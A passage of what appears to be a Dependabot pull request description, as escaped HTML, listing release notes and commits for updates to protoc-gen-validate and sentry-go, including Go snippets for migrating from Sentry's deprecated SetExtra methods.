view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/envoyproxy/protoc-gen-validate` from 1.2.1 to 1.3.3\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/envoyproxy/protoc-gen-validate/releases\"\u003egithub.com/envoyproxy/protoc-gen-validate's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev1.3.3\u003c/h2\u003e\n\u003cp\u003eOne more release attempt to get Python published on PyPI. 😄\u003c/p\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eUpdate Python 3.9 references to 3.10 by \u003ca href=\"https://github.com/stefanvanburen\"\u003e\u003ccode\u003e@​stefanvanburen\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bufbuild/protoc-gen-validate/pull/1370\"\u003ebufbuild/protoc-gen-validate#1370\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/bufbuild/protoc-gen-validate/compare/v1.3.2...v1.3.3\"\u003ehttps://github.com/bufbuild/protoc-gen-validate/compare/v1.3.2...v1.3.3\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev1.3.2\u003c/h2\u003e\n\u003cp\u003eFixing the \u003ccode\u003ev1.3.1\u003c/code\u003e release, which was fixing the \u003ccode\u003ev1.3.0\u003c/code\u003e release 😄.\u003c/p\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eAttempt to fix release by \u003ca href=\"https://github.com/stefanvanburen\"\u003e\u003ccode\u003e@​stefanvanburen\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bufbuild/protoc-gen-validate/pull/1368\"\u003ebufbuild/protoc-gen-validate#1368\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/bufbuild/protoc-gen-validate/compare/v1.3.1...v1.3.2\"\u003ehttps://github.com/bufbuild/protoc-gen-validate/compare/v1.3.1...v1.3.2\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev1.3.1\u003c/h2\u003e\n\u003cp\u003eThis is a release to get out \u003ca href=\"https://redirect.github.com/bufbuild/protoc-gen-validate/issues/1333\"\u003ePython support for 3.13\u003c/a\u003e, which failed to publish to PyPI in \u003ccode\u003ev1.3.0\u003c/code\u003e.\u003c/p\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eBump the java group across 1 directory with 4 updates by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/bufbuild/protoc-gen-validate/pull/1332\"\u003ebufbuild/protoc-gen-validate#1332\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eBump actions/checkout from 5 to 6 in the github-actions group by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/bufbuild/protoc-gen-validate/pull/1330\"\u003ebufbuild/protoc-gen-validate#1330\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix Java deployment by \u003ca href=\"https://github.com/pkwarren\"\u003e\u003ccode\u003e@​pkwarren\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bufbuild/protoc-gen-validate/pull/1335\"\u003ebufbuild/protoc-gen-validate#1335\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eUpdate settings.xml to use SONATYPE_USERNAME env var by \u003ca href=\"https://github.com/pkwarren\"\u003e\u003ccode\u003e@​pkwarren\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bufbuild/protoc-gen-validate/pull/1336\"\u003ebufbuild/protoc-gen-validate#1336\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eRun deployment with release profile by \u003ca href=\"https://github.com/pkwarren\"\u003e\u003ccode\u003e@​pkwarren\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bufbuild/protoc-gen-validate/pull/1337\"\u003ebufbuild/protoc-gen-validate#1337\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eRemove maven settings.xml file by \u003ca href=\"https://github.com/pkwarren\"\u003e\u003ccode\u003e@​pkwarren\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bufbuild/protoc-gen-validate/pull/1338\"\u003ebufbuild/protoc-gen-validate#1338\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eBump the java group in /java with 2 updates by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/bufbuild/protoc-gen-validate/pull/1334\"\u003ebufbuild/protoc-gen-validate#1334\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eBump the github-actions group with 2 updates by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/bufbuild/protoc-gen-validate/pull/1341\"\u003ebufbuild/protoc-gen-validate#1341\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eBump the java group in /java with 2 updates by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/bufbuild/protoc-gen-validate/pull/1340\"\u003ebufbuild/protoc-gen-validate#1340\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eBump the go-tests group in /tests with 2 updates by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/bufbuild/protoc-gen-validate/pull/1339\"\u003ebufbuild/protoc-gen-validate#1339\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eBump the java group across 1 directory with 2 updates by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/bufbuild/protoc-gen-validate/pull/1343\"\u003ebufbuild/protoc-gen-validate#1343\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eSupport for latest setuptools by \u003ca href=\"https://github.com/matejsp\"\u003e\u003ccode\u003e@​matejsp\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bufbuild/protoc-gen-validate/pull/1345\"\u003ebufbuild/protoc-gen-validate#1345\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eReplace deprecated java_proto_library from rules_java by \u003ca href=\"https://github.com/mmorel-35\"\u003e\u003ccode\u003e@​mmorel-35\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bufbuild/protoc-gen-validate/pull/1349\"\u003ebufbuild/protoc-gen-validate#1349\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eBump golang.org/x/net from 0.48.0 to 0.49.0 in /tests in the go-tests group by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/bufbuild/protoc-gen-validate/pull/1350\"\u003ebufbuild/protoc-gen-validate#1350\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eBump the java group across 1 directory with 4 updates by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/bufbuild/protoc-gen-validate/pull/1351\"\u003ebufbuild/protoc-gen-validate#1351\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eBump wheel from 0.45.1 to 0.46.2 by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/bufbuild/protoc-gen-validate/pull/1352\"\u003ebufbuild/protoc-gen-validate#1352\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eUpdate go and deps by \u003ca href=\"https://github.com/rodaine\"\u003e\u003ccode\u003e@​rodaine\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bufbuild/protoc-gen-validate/pull/1355\"\u003ebufbuild/protoc-gen-validate#1355\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eUpdate python and deps by \u003ca href=\"https://github.com/rodaine\"\u003e\u003ccode\u003e@​rodaine\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bufbuild/protoc-gen-validate/pull/1354\"\u003ebufbuild/protoc-gen-validate#1354\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eBump the java group in /java with 2 updates by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/bufbuild/protoc-gen-validate/pull/1356\"\u003ebufbuild/protoc-gen-validate#1356\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eBump the python-root group across 1 directory with 4 updates by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/bufbuild/protoc-gen-validate/pull/1357\"\u003ebufbuild/protoc-gen-validate#1357\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/bufbuild/protoc-gen-validate/compare/v1.3.0...v1.3.1\"\u003ehttps://github.com/bufbuild/protoc-gen-validate/compare/v1.3.0...v1.3.1\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev1.3.0\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eUpdate README.md by \u003ca href=\"https://github.com/nicksnyder\"\u003e\u003ccode\u003e@​nicksnyder\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bufbuild/protoc-gen-validate/pull/1233\"\u003ebufbuild/protoc-gen-validate#1233\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix unreliable asset generation by \u003ca href=\"https://github.com/nicksnyder\"\u003e\u003ccode\u003e@​nicksnyder\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bufbuild/protoc-gen-validate/pull/1235\"\u003ebufbuild/protoc-gen-validate#1235\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/bufbuild/protoc-gen-validate/commit/92b9a7df69ca9f71bfc492f7a90adf4d36eab569\"\u003e\u003ccode\u003e92b9a7d\u003c/code\u003e\u003c/a\u003e Update Python 3.9 references to 3.10 (\u003ca href=\"https://redirect.github.com/envoyproxy/protoc-gen-validate/issues/1370\"\u003e#1370\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/bufbuild/protoc-gen-validate/commit/e72f3dc29517fe8664e8f59680d0d48fa918df03\"\u003e\u003ccode\u003ee72f3dc\u003c/code\u003e\u003c/a\u003e Attempt to fix release (\u003ca href=\"https://redirect.github.com/envoyproxy/protoc-gen-validate/issues/1368\"\u003e#1368\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/bufbuild/protoc-gen-validate/commit/39d950bc7aafa91a2e592dc3a7b4768a189f0af1\"\u003e\u003ccode\u003e39d950b\u003c/code\u003e\u003c/a\u003e Bump the python-root group across 1 directory with 4 updates (\u003ca href=\"https://redirect.github.com/envoyproxy/protoc-gen-validate/issues/1357\"\u003e#1357\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/bufbuild/protoc-gen-validate/commit/c4c14142d65a4ba260d5f06fdd5e904f940c46a4\"\u003e\u003ccode\u003ec4c1414\u003c/code\u003e\u003c/a\u003e Bump the java group in /java with 2 updates (\u003ca href=\"https://redirect.github.com/envoyproxy/protoc-gen-validate/issues/1356\"\u003e#1356\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/bufbuild/protoc-gen-validate/commit/05cc215303e1297497ab092d97647eb4fb9ceb1a\"\u003e\u003ccode\u003e05cc215\u003c/code\u003e\u003c/a\u003e Update python and deps (\u003ca href=\"https://redirect.github.com/envoyproxy/protoc-gen-validate/issues/1354\"\u003e#1354\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/bufbuild/protoc-gen-validate/commit/1a76a21e21e50cbd1d42000baf3e8a285d6810dc\"\u003e\u003ccode\u003e1a76a21\u003c/code\u003e\u003c/a\u003e Update go and deps (\u003ca href=\"https://redirect.github.com/envoyproxy/protoc-gen-validate/issues/1355\"\u003e#1355\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/bufbuild/protoc-gen-validate/commit/3212c98f3a0381ab8ca2f7c2ac733adbdae361da\"\u003e\u003ccode\u003e3212c98\u003c/code\u003e\u003c/a\u003e Bump wheel from 0.45.1 to 0.46.2 (\u003ca href=\"https://redirect.github.com/envoyproxy/protoc-gen-validate/issues/1352\"\u003e#1352\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/bufbuild/protoc-gen-validate/commit/4231822c297f46ae238f7130e3d6f747a24b2005\"\u003e\u003ccode\u003e4231822\u003c/code\u003e\u003c/a\u003e Bump the java group across 1 directory with 4 updates (\u003ca href=\"https://redirect.github.com/envoyproxy/protoc-gen-validate/issues/1351\"\u003e#1351\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/bufbuild/protoc-gen-validate/commit/187ff66a4da4e35729d0946ae8eb24caf5168678\"\u003e\u003ccode\u003e187ff66\u003c/code\u003e\u003c/a\u003e Bump golang.org/x/net from 0.48.0 to 0.49.0 in /tests in the go-tests group (...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/bufbuild/protoc-gen-validate/commit/ae40bad58381838eeb79628bfaf3d560f8a85a4a\"\u003e\u003ccode\u003eae40bad\u003c/code\u003e\u003c/a\u003e Replace deprecated java_proto_library from rules_java (\u003ca href=\"https://redirect.github.com/envoyproxy/protoc-gen-validate/issues/1349\"\u003e#1349\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/envoyproxy/protoc-gen-validate/compare/v1.2.1...v1.3.3\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/getsentry/sentry-go` from 0.34.1 to 0.44.1\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/getsentry/sentry-go/releases\"\u003egithub.com/getsentry/sentry-go's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e0.44.1\u003c/h2\u003e\n\u003cblockquote\u003e\n\u003cp\u003e[!NOTE]\u003cbr /\u003e\nv0.44.0 had to be released as v0.44.1 due to a technical issue.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003ch3\u003eNew Features ✨\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eAdd RemoveAttribute api on the scope. by \u003ca href=\"https://github.com/giortzisg\"\u003e\u003ccode\u003e@​giortzisg\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/getsentry/sentry-go/pull/1224\"\u003e#1224\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eDeprecate \u003ccode\u003eScope.SetExtra\u003c/code\u003e, \u003ccode\u003eScope.SetExtras\u003c/code\u003e, and \u003ccode\u003eScope.RemoveExtra\u003c/code\u003e in favor of \u003ccode\u003eScope.SetAttributes\u003c/code\u003e and \u003ccode\u003eScope.RemoveAttribute\u003c/code\u003e by \u003ca href=\"https://github.com/giortzisg\"\u003e\u003ccode\u003e@​giortzisg\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/getsentry/sentry-go/pull/1224\"\u003e#1224\u003c/a\u003e\n\u003cul\u003e\n\u003cli\u003eThe recommended migration path is to use \u003ccode\u003eSetAttributes\u003c/code\u003e to attach values to logs and metrics. Note that attributes do not appear on error events; if you only capture errors, use \u003ccode\u003eSetTag\u003c/code\u003e or \u003ccode\u003eSetContext\u003c/code\u003e instead.\u003c/li\u003e\n\u003cli\u003eBefore:\u003c/li\u003e\n\u003c/ul\u003e\n\u003cpre lang=\"go\"\u003e\u003ccode\u003escope.SetExtra(\u0026quot;key.string\u0026quot;, \u0026quot;str\u0026quot;)\r\nscope.SetExtra(\u0026quot;key.int\u0026quot;, 42)\r\n\u003c/code\u003e\u003c/pre\u003e\n\u003cul\u003e\n\u003cli\u003eAfter (for error events) — use tags and contexts:\u003c/li\u003e\n\u003c/ul\u003e\n\u003cpre lang=\"go\"\u003e\u003ccode\u003escope.SetTag(\u0026quot;key.string\u0026quot;, \u0026quot;str\u0026quot;)\r\nscope.SetContext(\u0026quot;my_data\u0026quot;, sentry.Context{\u0026quot;key.int\u0026quot;: 42})\r\n\u003c/code\u003e\u003c/pre\u003e\n\u003cul\u003e\n\u003cli\u003eAfter (for logs and metrics) — use attributes:\u003c/li\u003e\n\u003c/ul\u003e\n\u003cpre lang=\"go\"\u003e\u003ccode\u003escope.SetAttributes(\r\n    attribute.String(\u0026quot;key.string\u0026quot;, \u0026quot;str\u0026quot;),\r\n    attribute.Int(\u0026quot;key.int\u0026quot;, 42),\r\n)\r\n\u003c/code\u003e\u003c/pre\u003e\n\u003c/li\u003e\n\u003cli\u003eAdd support for homogenous arrays by \u003ca href=\"https://github.com/giortzisg\"\u003e\u003ccode\u003e@​giortzisg\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/getsentry/sentry-go/pull/1203\"\u003e#1203\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAdd support for client reports by \u003ca href=\"https://github.com/giortzisg\"\u003e\u003ccode\u003e@​giortzisg\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/getsentry/sentry-go/pull/1192\"\u003e#1192\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAdd org id propagation in sentry_baggage by \u003ca href=\"https://github.com/giortzisg\"\u003e\u003ccode\u003e@​giortzisg\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/getsentry/sentry-go/pull/1210\"\u003e#1210\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAdd OrgID and StrictTraceContinuation client options. by \u003ca href=\"https://github.com/giortzisg\"\u003e\u003ccode\u003e@​giortzisg\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/getsentry/sentry-go/pull/1210\"\u003e#1210\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAdd the option to set attributes on the scope by \u003ca href=\"https://github.com/giortzisg\"\u003e\u003ccode\u003e@​giortzisg\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/getsentry/sentry-go/pull/1208\"\u003e#1208\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eBug Fixes 🐛\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e(serialization) Pre-serialize mutable event fields to prevent race panics by \u003ca href=\"https://github.com/giortzisg\"\u003e\u003ccode\u003e@​giortzisg\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/getsentry/sentry-go/pull/1214\"\u003e#1214\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eUse HEROKU_BUILD_COMMIT with HEROKU_SLUG_COMMIT as fallback by \u003ca href=\"https://github.com/ericapisani\"\u003e\u003ccode\u003e@​ericapisani\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/getsentry/sentry-go/pull/1220\"\u003e#1220\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eInternal Changes 🔧\u003c/h3\u003e\n\u003ch4\u003eAi\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003eAdd AGENTS.md and testing guidelines by \u003ca href=\"https://github.com/giortzisg\"\u003e\u003ccode\u003e@​giortzisg\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/getsentry/sentry-go/pull/1216\"\u003e#1216\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAdd dotagents configuration by \u003ca href=\"https://github.com/giortzisg\"\u003e\u003ccode\u003e@​giortzisg\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/getsentry/sentry-go/pull/1211\"\u003e#1211\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4\u003eDeps\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003eBump github.com/buger/jsonparser from 1.1.1 to 1.1.2 in /zerolog by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/getsentry/sentry-go/pull/1231\"\u003e#1231\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eBump github.com/gofiber/fiber/v2 from 2.52.11 to 2.52.12 in /fiber by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/getsentry/sentry-go/pull/1209\"\u003e#1209\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4\u003eOther\u003c/h4\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/getsentry/sentry-go/blob/master/CHANGELOG.md\"\u003egithub.com/getsentry/sentry-go's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e0.44.1\u003c/h2\u003e\n\u003cblockquote\u003e\n\u003cp\u003e[!NOTE]\u003cbr /\u003e\nThe v0.44.0 is missing due to a technical issue and had to be released again as v0.44.1\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003ch3\u003eNew Features ✨\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eAdd RemoveAttribute api on the scope. by \u003ca href=\"https://github.com/giortzisg\"\u003e\u003ccode\u003e@​giortzisg\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/getsentry/sentry-go/pull/1224\"\u003e#1224\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eDeprecate \u003ccode\u003eScope.SetExtra\u003c/code\u003e, \u003ccode\u003eScope.SetExtras\u003c/code\u003e, and \u003ccode\u003eScope.RemoveExtra\u003c/code\u003e in favor of \u003ccode\u003eScope.SetAttributes\u003c/code\u003e and \u003ccode\u003eScope.RemoveAttribute\u003c/code\u003e by \u003ca href=\"https://github.com/giortzisg\"\u003e\u003ccode\u003e@​giortzisg\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/getsentry/sentry-go/pull/1224\"\u003e#1224\u003c/a\u003e\n\u003cul\u003e\n\u003cli\u003eThe recommended migration path is to use \u003ccode\u003eSetAttributes\u003c/code\u003e to attach values to logs and metrics. Note that attributes do not appear on error events; if you only capture errors, use \u003ccode\u003eSetTag\u003c/code\u003e or \u003ccode\u003eSetContext\u003c/code\u003e instead.\u003c/li\u003e\n\u003cli\u003eBefore:\u003c/li\u003e\n\u003c/ul\u003e\n\u003cpre lang=\"go\"\u003e\u003ccode\u003escope.SetExtra(\u0026quot;key.string\u0026quot;, \u0026quot;str\u0026quot;)\nscope.SetExtra(\u0026quot;key.int\u0026quot;, 42)\n\u003c/code\u003e\u003c/pre\u003e\n\u003cul\u003e\n\u003cli\u003eAfter (for error events) — use tags and contexts:\u003c/li\u003e\n\u003c/ul\u003e\n\u003cpre lang=\"go\"\u003e\u003ccode\u003escope.SetTag(\u0026quot;key.string\u0026quot;, \u0026quot;str\u0026quot;)\nscope.SetContext(\u0026quot;my_data\u0026quot;, sentry.Context{\u0026quot;key.int\u0026quot;: 42})\n\u003c/code\u003e\u003c/pre\u003e\n\u003cul\u003e\n\u003cli\u003eAfter (for logs and metrics) — use attributes:\u003c/li\u003e\n\u003c/ul\u003e\n\u003cpre lang=\"go\"\u003e\u003ccode\u003escope.SetAttributes(\n    attribute.String(\u0026quot;key.string\u0026quot;, \u0026quot;str\u0026quot;),\n    attribute.Int(\u0026quot;key.int\u0026quot;, 42),\n)\n\u003c/code\u003e\u003c/pre\u003e\n\u003c/li\u003e\n\u003cli\u003eAdd support for homogenous arrays by \u003ca href=\"https://github.com/giortzisg\"\u003e\u003ccode\u003e@​giortzisg\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/getsentry/sentry-go/pull/1203\"\u003e#1203\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAdd support for client reports by \u003ca href=\"https://github.com/giortzisg\"\u003e\u003ccode\u003e@​giortzisg\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/getsentry/sentry-go/pull/1192\"\u003e#1192\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAdd org id propagation in sentry_baggage by \u003ca href=\"https://github.com/giortzisg\"\u003e\u003ccode\u003e@​giortzisg\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/getsentry/sentry-go/pull/1210\"\u003e#1210\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAdd OrgID and StrictTraceContinuation client options. by \u003ca href=\"https://github.com/giortzisg\"\u003e\u003ccode\u003e@​giortzisg\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/getsentry/sentry-go/pull/1210\"\u003e#1210\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAdd the option to set attributes on the scope by \u003ca href=\"https://github.com/giortzisg\"\u003e\u003ccode\u003e@​giortzisg\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/getsentry/sentry-go/pull/1208\"\u003e#1208\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eBug Fixes 🐛\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e(serialization) Pre-serialize mutable event fields to prevent race panics by \u003ca href=\"https://github.com/giortzisg\"\u003e\u003ccode\u003e@​giortzisg\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/getsentry/sentry-go/pull/1214\"\u003e#1214\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eUse HEROKU_BUILD_COMMIT with HEROKU_SLUG_COMMIT as fallback by \u003ca href=\"https://github.com/ericapisani\"\u003e\u003ccode\u003e@​ericapisani\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/getsentry/sentry-go/pull/1220\"\u003e#1220\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eInternal Changes 🔧\u003c/h3\u003e\n\u003ch4\u003eAi\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003eAdd AGENTS.md and testing guidelines by \u003ca href=\"https://github.com/giortzisg\"\u003e\u003ccode\u003e@​giortzisg\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/getsentry/sentry-go/pull/1216\"\u003e#1216\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAdd dotagents configuration by \u003ca href=\"https://github.com/giortzisg\"\u003e\u003ccode\u003e@​giortzisg\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/getsentry/sentry-go/pull/1211\"\u003e#1211\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4\u003eDeps\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003eBump github.com/buger/jsonparser from 1.1.1 to 1.1.2 in /zerolog by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/getsentry/sentry-go/pull/1231\"\u003e#1231\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eBump github.com/gofiber/fiber/v2 from 2.52.11 to 2.52.12 in /fiber by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/getsentry/sentry-go/pull/1209\"\u003e#1209\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... 